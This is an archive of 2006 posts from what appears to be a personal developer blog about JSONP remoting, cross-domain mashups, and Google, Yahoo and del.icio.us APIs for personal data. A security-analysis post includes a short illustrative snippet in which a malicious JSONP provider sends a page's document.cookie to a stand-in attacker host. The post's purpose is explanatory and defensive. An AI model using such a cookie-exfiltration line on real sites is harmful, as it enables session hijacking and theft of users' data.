Thursday, October 26, 2006

JSONRequest by Douglas Crockford

Douglas Crockford is now proposing a new native JavaScript object called "JSONRequest", analogous to XMLHttpRequest.

http://ajaxian.com/archives/jsonrequest-proposal

I read through the proposal and found that it deliberately omits cookie information from its request headers.

http://www.json.org/JSONRequest.html

JSONRequest does not send or receive cookies or passwords in HTTP headers. This avoids false authorization situations. Knowing the name of a site does not grant the ability to use its browser credentials.
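For reference, the proposed API looks roughly like the sketch below. This is based on my reading of the proposal, so treat the exact names and argument order as assumptions rather than a definitive reference.

    // Hypothetical usage of the proposed JSONRequest object.
    // The request carries no cookies or HTTP authentication.
    var requestNumber = JSONRequest.post(
        "https://example.com/service",        // cross-domain URL is allowed
        { query: "hello" },                   // JSON value to send
        function (seq, value, exception) {    // done callback
            if (exception) {
                alert("request " + seq + " failed: " + exception.message);
            } else {
                alert("request " + seq + " returned a JSON value");
            }
        }
    );
    // A pending request could be cancelled by its number, e.g.:
    // JSONRequest.cancel(requestNumber);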


By ignoring cookies, this new cross-domain request approach may indeed be safe, but on the other hand it throws away the chance to enable personalized mashups. For example, if you wish to embed your e-mail inbox list in your favorite portal service, JSONRequest cannot do that, because its requests carry no cookies.

I think it would be better to have opt-in mechanisms for both remote services and end users. Considering that almost all Ajax applications today assume JSON comes only from the same domain, an opt-out scheme (such as referer-based JSONP access control, the technique used on this very blog) is rather unsafe in this case.
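For comparison, that opt-out technique is essentially a server-side check of the Referer header before serving the JSONP response. A minimal sketch in plain JavaScript, with hypothetical host names; a real server would plug this into its own request handling:

    // Hypothetical allow list; the host names are examples only.
    var allowedReferers = ["www.geocities.jp", "my-blog.example"];

    function isAllowedReferer(refererHeader) {
        // No Referer at all is treated as "unknown", so reject it here.
        if (!refererHeader) { return false; }
        for (var i = 0; i < allowedReferers.length; i++) {
            if (refererHeader.indexOf("://" + allowedReferers[i] + "/") >= 0) {
                return true;
            }
        }
        return false;
    }

    // The JSONP endpoint would serve the personalized feed only when
    // isAllowedReferer(...) returns true; otherwise it could return an
    // empty response such as  callback(null);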

Anyway, this is still a new proposal, and it may take years before it is built into most browsers. I hope this opinion reaches him (or the relevant communities) in one way or another.


Monday, October 02, 2006

Yahoo BB Auth

Recently Yahoo! U.S. introduced an API that enables third-party developers to access their users' identities.
They call it "Browser-Based Authentication", abbreviated "Yahoo BB Auth".
http://developer.yahoo.com/auth/

I found the naming confusing, especially for Japanese Yahoo! users. The Japanese telecom company Softbank and Yahoo! Japan have already branded their ADSL service as "Yahoo! BB". If you search for "Yahoo BB" today, almost all results are about that broadband internet service. This suggests that whoever is in charge of branding at Yahoo! is not fully aware of their local services.

Anyway, this kind of service is interesting and sounds nice to me. Google has already released its account authentication API, and Flickr was probably the first (AFAIK) to open up this kind of external access. This feature will be another must-have for future web 2.0 services.

But for the people pushing ahead with the Liberty Alliance or user-centric identity, this kind of movement might be unwelcome. Dick Hardt, CEO of Sxip, says "Yahoo/Google is deepening its identity silo", arguing that they haven't learned from the failure of MS .NET Passport.

A user-centric, or distributed, identity system is nice. I love it. But I'm afraid the lack of one may not have been the main reason for .NET Passport's failure. For now, users don't seem particularly uncomfortable with these services, and developers are delighted with them. Who is going to stop this opening-up of identity access, even if the API is proprietary? Since the services themselves are absolutely proprietary, developers won't be too upset if the API is proprietary too.


Friday, September 01, 2006

JSONP Private Calendar Mashup with Simile Timeline

I've created an interesting demo to show how personalized web 2.0 services can be used in a mashup application.

http://www.geocities.jp/stormriders999/timeline.html

I'm using the MIT Simile Timeline for the dynamic user interface.

You'll see your own private schedule data from Google Calendar mashed up there, but only if you grant access to it.

Yes, it is a genuinely personalized service for you.



Wednesday, August 30, 2006

Personalized JSONP - Google Calendar JSON Proxy Service

The Google Account Authentication API and the Google Calendar GData API let us integrate private schedule information into our applications, but they still require us to deal with Google's own authentication protocol and to host the program on some application server infrastructure.

Although it is read-only access, we can look up remote feeds directly from the browser if they are provided in JSON form. JSONP is a well-known technique for this kind of JSON remoting.

But as far as I know, we currently don't have any JSON feeds of personalized content. All JSON feeds on the internet are public - not personalized, and accessible to everyone in the world.

Maybe that's because of security and privacy concerns. But I currently think it would be fine to feed private data as JSON as long as an appropriate opt-in/opt-out mechanism is provided.

So I've implemented a JSON feed service for private data - Google Calendar schedules. Now third-party applications can fetch a visitor's private calendar information quite easily, as long as the visitor has allowed them to do so.
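A third-party page would consume it in the usual JSONP way, roughly like the sketch below. The path, parameter, and field names here are hypothetical; please refer to the sample client linked below for the actual interface.

    // Callback that receives the visitor's calendar entries as JSON.
    function showEvents(feed) {
        var list = document.getElementById("events");
        for (var i = 0; i < feed.entries.length; i++) {    // field names assumed
            var li = document.createElement("li");
            li.appendChild(document.createTextNode(feed.entries[i].title));
            list.appendChild(li);
        }
    }

    // On-demand script loading; the visitor's own session and consent at the
    // proxy decide whether real data or an empty feed comes back.
    var script = document.createElement("script");
    script.src = "http://gcal2json.ning.com/feed?callback=showEvents";  // hypothetical path
    document.getElementsByTagName("head")[0].appendChild(script);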

Please check out the site below:

Google Calendar JSON Proxy Service
http://gcal2json.ning.com/

There's also a sample client application.

http://www.geocities.jp/stormriders999/gcal_json_client_sample_e.html


Don't you think this is a really good personalized web 2.0 service?


Thursday, August 10, 2006

del.icio.us network JSON

del.icio.us has released a network badge.

We can also get the data as JSON.

http://del.icio.us/feeds/json/network/stomita

JSONP is also supported.

http://del.icio.us/feeds/json/network/stomita?callback=handleNetwork
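So a page can consume it with nothing but a callback and a script tag. In the sketch below I'm assuming the feed returns an array of entries with a user name field; check the actual response in a browser before relying on the exact shape.

    // Receives the network feed; the exact item structure is an assumption.
    function handleNetwork(network) {
        var names = [];
        for (var i = 0; i < network.length; i++) {
            names.push(network[i].user);              // field name assumed
        }
        document.getElementById("network").innerHTML = names.join(", ");
    }

    // On-demand script loading of the JSONP feed shown above.
    var s = document.createElement("script");
    s.src = "http://del.icio.us/feeds/json/network/stomita?callback=handleNetwork";
    document.getElementsByTagName("head")[0].appendChild(s);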


This feature hasn't been officially announced, though.


Thursday, August 03, 2006

Custom Calendar App using Google Authentication API for WebApp

About a month ago, Google announced that third-party web apps could access their users' private data (with the end user's permission, of course). But somehow I couldn't build a working app that accessed their actual service data - maybe because of a service bug on Google's side, or because I misunderstood the protocol. Today, however, I finally found the way to grab private schedule feed entries from Google Calendar.

http://googleaccount.ning.com/

Click "Your private schedules in Google Calendar", and please say "Accept" when prompted by Google. I'm simply showing your calendar feeds. Not inserting, updating, deleting, and not evilly storing the retrieved information.

You can see the source code if you are a member of Ning.


Monday, July 03, 2006

Google Account Authentication and Identity Web Services

Google recently announced the release of their account authentication API for web applications. In a nutshell, they now allow other web apps to use Google account information for login, which is very similar to single sign-on.

But what distinguishes this from plain SSO is that Google is providing third parties not only with its authentication system but also with its application service endpoints.

Here is a simplified sequence of Google's authentication flow. First, the web app receives a single-use token from Google via the visiting user. Using this token, the web app queries Google for a further token that grants access to application services. Finally, that token enables the web app to access the user's private information (inbox, schedules) kept by Google's web application services (Gmail, Google Calendar).
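In concrete terms the flow looks something like the sketch below. The endpoint and parameter names are taken from my reading of Google's documentation, so double-check them before use.

    // 1. Send the user to Google to ask for consent. "next" is where Google
    //    redirects the user back to; "scope" names the service feed.
    var authUrl = "https://www.google.com/accounts/AuthSubRequest"
        + "?next=" + encodeURIComponent("http://mashup.example/back")   // hypothetical
        + "&scope=" + encodeURIComponent("http://www.google.com/calendar/feeds/")
        + "&session=1";
    // location.href = authUrl;

    // 2. Google redirects back with a single-use token in the query string,
    //    e.g.  http://mashup.example/back?token=ABCD1234

    // 3. The web app exchanges it for a session token and then calls the
    //    GData feed with an Authorization header such as:
    //      Authorization: AuthSub token="SESSION_TOKEN"
    //    (these last steps run on the server, not in the browser)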

Of course, it is important that there is a process for obtaining the user's consent before any token is sent to the web app. In this process the user can judge whether the web app is trustworthy, and if so, grant it access to his private information with limited privileges (e.g. read-only, with write access denied).

In fact, as the phrase "service endpoints to 3rd parties" implies, this is far more a "mashup" story than an "identity" story.

Nowadays almost all mashup services are public. For example, Amazon's search service returns the same results for the same query conditions, and Google Maps doesn't change its map data according to the logged-in user. They only provide unrestricted public web services whose interface happens to be XML or JavaScript rather than HTML.

Of course, some mashup builders who have their own users may combine those users' information with the public web services, but so far the users' private information itself is rarely opened up to others.

I think this situation is caused partly by executive decisions that treat the user base as the company's own property, and partly by the difficulty of implementing a privacy system for these services.

The Liberty Alliance and other identity federation standards set out to address these technical issues: publishing standard protocols, helping vendors implement products, and finally approaching executives to convince them to adopt the standards.

Although this approach has succeeded in parts of the market - European mobile carriers, for example, or American B2B services - their original big picture was "to be the identity infrastructure for the entire web", and the current situation is far from that. They may insist they are still on the way there, but they have been doing the same thing for five years already. Liberty itself no longer seems vibrant, nor driven by any passion to change the world.

Let's go back a little further. I remember the first company that wanted to dominate the web identity world - Microsoft. Their Passport is now branded a failure, but its primary purpose was exactly the same as Google's today: to offer identity web services to third parties on top of the Microsoft (or Google) platform. Passport failed without gaining strong support from users, perhaps because it couldn't answer the privacy concerns of the day (or didn't explain itself well enough), or because its excessive centralization - a fault Liberty later corrected - didn't suit existing services.

If Google is doing exactly what Microsoft did, won't it just repeat that history of failure? Some bloggers say "it's like deja vu". But for the following reasons, I think this service will win support among certain people.


  1. It is a platform provided by a service provider

    • Google already has many attractive services, and developers will definitely be interested in mashing them up. Thanks to Google's massive user base, third-party contributors have plenty of incentive.

    • Microsoft, I think, was originally platform-oriented rather than service-oriented. Its services were to be supplied later, so the benefits of adopting its platform were not very clear to either end users or third parties.



  2. It is a developer-oriented service

    • Unlike existing enterprise-oriented authentication services, developers can use this service freely even as individuals. By essentially waiving service fees and delegating trust decisions to users, it sidesteps the complex problem of contracts. This openness will attract so many developers that it may trigger an Internet-scale explosion.

    • Liberty was a bit messy for developers. Its specification process was nominally open, but in practice dominated by the big software vendors, and Liberty's promoters focused heavily on a top-down approach. While they were busy trying to convince conservative executives, other identity standards and proprietary identity web services spread across the web.



  3. Other service providers will follow it

    • Google is becoming one of those rare brands whose name alone can sway the C-level, at least at companies built on the same profit model as Google (advertising). For these companies, Google is not only a threat but also an important reference model. In fact, Yahoo! U.S. has already announced plans to introduce an authentication service.

    • As newcomers enter the open identity platform field, its business model will be recognized by other service providers, possibly establishing a real market.





This may be ironic for the people who have been saying that centralization is evil - the Liberty Alliance, or the recent user-centric identity supporters (who say that even Liberty doesn't give end users real "liberty"). But user-centric identity is still an emerging movement, so it may yet merge with (or absorb) this one in the future.


Friday, June 02, 2006

Google AJAX Search and JSON Web Service Calling

In this blog I've written about remoting with JSON via dynamic script loading (JSONP). It's great because it requires no app server for mashing up services, and it scales well.

Among the major service providers, del.icio.us noticed this first and made it widely available to developers, and then Yahoo implemented the same feature in an even more sophisticated form. Amazon's XSLT feature enables the same kind of service. The giant Google, however, had so far offered no service interface for browser applications (except Google Maps).

But finally they introduced 'Google AJAX Search'.

This lets you embed an Ajax-style search box in your site. No proxy server is needed; static HTML is enough to host it.

I've looked into how the Ajax search works, and found that they are also using the JSON with padding technique. Here is a URL used in the background communication (note that it is not an XMLHttpRequest call!):

http://www.google.com/uds/GwebSearch?callback=GwebSearch.RawCompletion&lstkp=0&context=0&rsz=small&hl=ja&q=Google&key=internal-documentation&v=0.1


This is good news for me because I can add this Google service to my JSON with padding test page, which already covers Yahoo, Amazon, del.icio.us, and a generic rss2json service. While implementing the Google JSONP test, though, I found that its response interface is a little different from the others, so I carefully modified my JSONP stub JavaScript class so as not to affect the other services.
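The real stub lives in the test page's source; conceptually it is just a small helper that knows, per service, which URL parameter carries the callback name and registers a temporary global function. A simplified sketch (not the actual class used on the page):

    // Simplified sketch of a JSONP stub.
    var JsonpStub = {
        counter: 0,
        call: function (url, handler, callbackParam) {
            var name = "__jsonp_cb" + (this.counter++);   // unique global name
            window[name] = function (data) {
                handler(data);
                window[name] = undefined;                 // clean up after use
            };
            var sep = (url.indexOf("?") >= 0) ? "&" : "?";
            var script = document.createElement("script");
            script.src = url + sep + (callbackParam || "callback") + "=" + name;
            document.getElementsByTagName("head")[0].appendChild(script);
        }
    };

    // Usage against any JSONP endpoint; the response handling for Google's
    // service needs its own small adjustment, as noted above.
    // JsonpStub.call("http://api.example.com/search?q=Google", showResult);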

This is my JSON with padding test page.
http://www.geocities.jp/stormriders999/jsontest.html




Monday, May 22, 2006

dojo 0.3.0 supports JSONP

Dojo 0.3.0 was released a few days ago (actually I'm not sure exactly when), and the release is said to support the JSONP callback style in ScriptSrcIO.

http://archive.dojotoolkit.org/nightly/tests/io/test_ScriptSrcIO.html


So if you are a Dojo toolkit user, your Ajax applications can easily connect to various data sources on the internet - Yahoo, del.icio.us, Amazon, and Google (Reader), for example - without consuming your own server resources. Yes, it is completely cross-domain Ajax.


Monday, May 01, 2006

Del.icio.us brows.er

I've created another tool: del.icio.us brows.er.

The interface looks like del.icio.us direc.tor, but brows.er differs from direc.tor in several ways.

  • No bookmarklet. Just visit the page linked above.

  • No server hosting environment. You can even run it on your local PC - try saving the page as an HTML document.

  • No API authentication. All data is fetched via public JSON feeds.

  • Not restricted to your own posts. Any del.icio.us user's posts are browsable.




Friday, April 14, 2006

JSON Feeds of Google Reader

You may know "Google Reader" - kind of online RSS reader - are providing publishing feature for your labeled and publicly opened feeds. You can copy the code and paste it to your blog.

For example, here is my feed about web 2.0.




If you check the HTML source of this page, you might notice that this is a kind of JSON with padding (JSONP) call. You can see what feed data Google sends via the following URLs:

http://www.google.com/reader/public/javascript/user/03853986730064725171/label/web2.0?n=5

http://www.google.com/reader/public/javascript/user/03853986730064725171/label/web2.0?n=5&callback=hello

The most intuitive way to explore JSONP services, I think, is to use my JSON with Padding Tester. Arbitrary JSONP services (including Yahoo, del.icio.us, and Amazon with XSLT) can be visualized with it, and of course it works for this Google JSON service too.



Wednesday, March 01, 2006

Name Changed : My Del.icio.us Recommendation Snippet

I recently noticed that del.icio.us itself provides a "Del.icio.us Recommendation Engine", so I have renamed my module to "My Del.icio.us Recommendation Snippet".

The name clash happened because I chose such an obvious name, but in any case the two are totally different: the former (the original) is internal functionality of the del.icio.us service itself, while the latter (the one I created) is a script snippet using the del.icio.us JSON call interface that can be embedded in any web site.

Wednesday, February 22, 2006

Why the del.icio.us recommendation engine is not personalized 2.0

First, you have to tell the site you are visiting your del.icio.us ID. In principle this shouldn't be necessary, because what we need is your recent tagging information, not your ID. Unfortunately, del.icio.us's feed interface means the site owner has to know your del.icio.us ID to get your bookmark information. In general, forcing people to reveal a unique ID is undesirable from a privacy standpoint.

Second, this module doesn't handle the case where identity information is access controlled in the first place. del.icio.us bookmarks are clearly identity information, but they are not restricted - they are always published to the general public. To deal with identity-aware web services in general, we have to consider access-controlled services as well.

These are not the only issues with personalized 2.0 services. Given time, I could list many more that need to be solved.

Del.icio.us Recommendation Engine

While researching del.icio.us's recent native support for JSONP, an interesting idea hit me and fired up my imagination. I devoted the last few days to development, and finally created an attractive script module. I call it the "Del.icio.us Recommendation Engine".

"Del.icio.us Recommendation Engine" is a recommendation link list generator extracted from site owner's bookmarks archived in del.icio.us. If you tell your del.icio.us ID to the site, you can get the site owner's bookmarks as a recommendation. While creating your recommendation list, your recent del.icio.us posts and associated tags automatically used as your preference information.

It's cool because no server infrastructure is needed to generate the recommendation list: the entire process runs in client-side JavaScript, using JSON (or JSONP) and on-demand JavaScript to fetch the del.icio.us posts.
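The core idea is simple: load the visitor's recent posts to collect preferred tags, then score the site owner's bookmarks by tag overlap. A stripped-down sketch (the u/d/t field names follow the usual del.icio.us JSON feed shape, which is my assumption here):

    // ownerPosts and visitorPosts are arrays loaded via the JSONP feeds;
    // each post is assumed to look like { u: url, d: description, t: [tags] }.
    function recommend(ownerPosts, visitorPosts, max) {
        var preferred = {};
        for (var i = 0; i < visitorPosts.length; i++) {
            var tags = visitorPosts[i].t || [];
            for (var j = 0; j < tags.length; j++) { preferred[tags[j]] = true; }
        }
        var scored = [];
        for (var k = 0; k < ownerPosts.length; k++) {
            var post = ownerPosts[k], score = 0, ptags = post.t || [];
            for (var m = 0; m < ptags.length; m++) {
                if (preferred[ptags[m]]) { score++; }
            }
            if (score > 0) { scored.push({ post: post, score: score }); }
        }
        scored.sort(function (a, b) { return b.score - a.score; });
        return scored.slice(0, max);   // top recommendations
    }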

Seeing is believing - please go and try it.

I think it's an interesting module, but I don't consider it the final achievement of my personalized 2.0 project. Yes, it does a kind of personalization for visitors, but the techniques it uses won't work in many cases. Many issues remain to be solved before this becomes a generic solution for personalized web 2.0 services.

Anyway, I've created a "personalized 2.0"-like service module. It's great fun - enjoy.

Thursday, February 16, 2006

Del.icio.us is Now Doing JSONP, or Callback Support

I don't know when del.icio.us started its JSON service, but until now the JSON interface for bookmark information was only a static one: posts were exposed through a static 'Delicious' JavaScript object. That approach apparently doesn't support parallel queries (they would clobber each other's results) and doesn't deal with name conflicts.

But while testing my JSON with Padding Tester (JSONP Tester), I found that they have implemented a callback function parameter, just like Yahoo.

Check this out:

http://del.icio.us/feeds/json/stomita?callback=JsonUtil.responseCallbacks%5B0%5D
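The difference from the old static interface is easy to see in the response bodies. The static form below is written from memory, so take the exact variable names as an assumption:

    // Static style: every response assigns to the same global object,
    // so two parallel requests overwrite each other.
    if (typeof Delicious == "undefined") Delicious = {};
    Delicious.posts = [ { "u": "http://...", "d": "...", "t": ["..."] } ];

    // Callback style: each request names its own handler, so responses
    // can never clobber one another.
    JsonUtil.responseCallbacks[0]([ { "u": "http://...", "d": "...", "t": ["..."] } ]);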


It isn't mentioned on the official help pages, and I couldn't find any articles about this new feature. I'm not sure when they implemented it (it may be old).

Anyway, I've added a del.icio.us call to the JSONP Tester page.



JSONP Service and Security

Before talking about shared services, I should clarify what issues (or concerns) are currently discussed around JSONP services (perhaps not discussed much, since there are fewer of them than ordinary REST XML or SOAP web services). In particular, I'll focus on security concerns. Since XMLHttpRequest itself doesn't allow requests to any site other than the one the HTML came from (the same-origin policy), JSONP services may raise the same or similar concerns.

Let's say Site Y is a JSONP service site (like Yahoo), Site M is your JSONP mashup site, and User u is a visitor to Site M. Site O is an ordinary web service provider unrelated to these services, but a potential target for an attacker.

(Note that what follows is only my own analysis.)


If M is malicious, can M steal u's identity information held by Y?



M cannot steal it without Y's cooperation. If Y exposes an unrestricted JSONP interface to u's identity information, then M can. If u never consented, Y should be held responsible for the unintended use of u's identity information.


If Y is malicious, can Y do bad things to M (information theft, session hijacking)?



Absolutely. The loaded JSONP response doesn't have to be a JSON object at all - it is nothing but JavaScript, and its content is entirely under Y's control. The loaded code is executed automatically, without any validation (this is the key point of JSONP), and it runs with Site M's privileges. So M has to trust Y for as long as M uses Y's service.
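To make the point concrete, here is a deliberately simplified sketch of what a malicious Y could return instead of the expected callback call (the attacker host and callback name are of course made up):

    // What M expects from Y:
    //   handleResult({"items": [ ... ]});
    // What a malicious Y could return instead - it runs as Site M's code:
    new Image().src = "http://attacker.example/collect?c="
        + encodeURIComponent(document.cookie);
    handleResult({"items": []});   // keep the page working so nobody notices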


If Y suddenly turns malicious and the loaded code harms M, who is responsible?



Basically Y is responsible, of course. But if what is stolen is u's identity information held by M, then M should also bear responsibility (for the unintended use of u's identity information).


If Y is malicious, can Y attack O?



Yes - for example, by firing a huge number of requests at O, so that, much like a DDoS attack, the requests appear to come from User u. But this isn't special to JSONP, since any malicious site can do the same. The main concern here is trust. If User u trusted Site M but didn't know M was using Y's service (and u might not trust Y), then M was responsible for explaining in advance that it uses Y's services, because, had u been told, u might not have used M at all. M should also bear some responsibility toward Site O.


Can Y steal u's identity information held by Site O?



Basically no. If O has vulnerabilities, it might be possible. If u has somehow enabled cross-domain XMLHttpRequest (through a browser setting?), it might also be possible, but that is u's own responsibility.


Can Y interfere with transactions between u and O?



Basically no. If O has vulnerabilities it might be possible - CSRF is one example - and O should be responsible for its own vulnerabilities.


Saturday, February 11, 2006

JSON with Padding Tester

Contrary to my previous post, this one doesn't go further into my project's details. Instead I'd like to show something I've built for the project so far.

As I posted before, the combination of on-demand JavaScript and JSON is really nice, and the protocol called JSONP (JSON with Padding) is a good implementation of it (Yahoo is now doing something similar!). However, while XMLHttpRequest can be tested and monitored with tools like Firebug, JSONP apparently cannot.

So I created a tiny testing tool to fill this gap. With the JSON with Padding Tester, you can test your JSONP service by entering and submitting its URL. The default input is pre-filled with the Yahoo Search Web Service URL (with the search keyword 'google'), and the JSONP URL parameter is set to 'callback' - you can change it to whatever parameter name you prefer - so you can easily see what kind of tool this is.


Thursday, February 09, 2006

Remoting Technique in Personalized 2.0 Services

Since I want to connect to services all around the world, remoting from the web browser is essential. XMLHttpRequest, said to be the key element of Ajax, lets the browser retrieve data asynchronously from server-side services; thanks to it, we can treat the web browser as a web service client. But for the following reasons I'm not keen on using it.

The most disappointing thing about XMLHttpRequest is that it cannot reach services hosted on other domains. This restriction presumably comes from security and privacy concerns. To work around it, the Cross-Domain Proxy technique is often used. However, needing a server in the same domain to proxy every browser request prevents the approach from scaling.

XMLHttpRequest is not the only way to fetch data asynchronously, though. There is another way for the browser to retrieve service data dynamically: the combination of on-demand JavaScript and JSON.

JSON is a data format that the JavaScript engine can parse directly, by calling JavaScript's eval() function. For security reasons eval() is not really recommended for remotely retrieved data, but if the remote service itself is trusted, it is very convenient. For example:
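    // jsonText has arrived as a string, e.g. from XMLHttpRequest.
    var jsonText = '{ "name": "stomita", "tags": ["json", "ajax"] }';
    // The extra parentheses make eval() treat the text as an expression,
    // not as a code block.
    var data = eval("(" + jsonText + ")");
    alert(data.name);   // "stomita"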

In the on-demand JavaScript pattern, however, we don't use eval() at all. There are several ways to evaluate JSON data - the del.icio.us JSON feed is one way of including a remotely provided JSON object - but the most useful, I think, is the idea called JSONP (JSON with Padding). It is something like a protocol between the JavaScript client and the JSON server: the client passes a callback function name in a URL parameter, and the server returns a call to that function with the JSON data as its argument. The same idea appears in Yahoo Web Services' JSON output, and it works well. The exchange looks roughly like this:
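    // Client side: declare the callback, then load the service on demand.
    // The URL and response shape below are hypothetical.
    function handleResult(data) {
        alert("got " + data.items.length + " items");   // shape depends on the service
    }
    var script = document.createElement("script");
    script.src = "http://api.example.com/search?query=json&callback=handleResult";
    document.getElementsByTagName("head")[0].appendChild(script);

    // Server side: the response body is just a call to the named function:
    //   handleResult({"items": [ ... ]});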

One really good thing about on-demand JavaScript and JSON, compared with XMLHttpRequest plus a cross-domain proxy, is that user authentication stays simple. Almost all web applications maintain the user's session with cookies, which are sent automatically with each request. Because an on-demand JavaScript request is exactly the same as an ordinary browser request, a JSON server can identify the requesting user from the cookies it issued earlier.

A cross-domain proxy, on the other hand, can request remote resources, but the actual requester is the local server, not the browser, so no cookies are available. Since authentication is always needed to access-control or personalize service information, the local server has to hold the end user's credentials for the remote service.

For these reasons, I'm adopting on-demand JavaScript with JSON calls as my remoting technique. It can be regarded as a user-centric approach. In any case, my real interest is in sharing personalized or individual data (that is, identity-aware data) from anywhere in the world. The next post will be about that.



Wednesday, February 08, 2006

Blogging about "Personalized 2.0", now started

Influenced by the attractive recent movement known as "web 2.0", I've decided to start a project of cutting-edge software development and to blog about it.

Although English is not my native tongue - I'm Japanese, living in Japan - it's worth writing this blog in English, because an enormous number of people seem interested in recent web movements, and my ideas may attract some of them - at least I hope so.

I currently work at an enterprise software company, where I've been involved in web application design - especially application security, identity management, and role-based access control. In enterprise environments these days almost every company uses Java or J2EE (Microsoft shops aside), while most web developers seem to use scripting languages like PHP, Ruby, or Perl. I'm not very familiar with those server-side scripting languages, but that doesn't affect my development much: everything required to build a web 2.0 software service is common, standards-based technology - HTML, the DOM, XML, and JavaScript.

As the blog title shows, my initial purpose in starting this blog and development project is to bring a "personalized" dimension to web 2.0 services. We have seen many web 2.0 services so far, but almost all of them are public and not aimed at the individual. Of course they often have user accounts, and they maintain their data through those end users' contributions, but the information retrieved from them is always public - that is, not access controlled.

Some might say that users' contribution to public information is the essence of web 2.0 and is valuable in itself, but I think it limits web 2.0's potential. Imagine a mashup service that combines your address book records with Google Maps. Such a service is attractive and seems feasible, but it requires the mashup site to collect and keep your address book information. This implies that services dealing with personal data, like address books or schedules, cannot be delivered as easily as the Amazon book search, Yahoo web search, or Google Maps - the representative mashup ingredients.

There are services, like Flickr or EVDB (Eventful), that have web APIs for accessing their personal data. But every successful mashup using Flickr relies on the public service API, not the personalized one. If a provider wanted to build a personalized Flickr mashup, handing over credentials raises security and privacy concerns: I certainly don't want to give my Flickr password to some unknown, fishy site, even if it claims to offer a great Flickr mashup. I think this is one of the things preventing identity-aware web 2.0 services from spreading.

Another significant reason is that they only offer XML web service APIs. Making XML calls requires some server infrastructure; every request is processed or proxied by a server, so the service doesn't scale if resources are limited. Compare that with a Google Maps mashup - no need to set up CGI, a static web site is enough!

With these points in mind, I've started a project I'm calling "personalized 2.0". In it I will take a user-centric approach, which may resemble the approach called "identity 2.0". Later posts will explain in more detail.
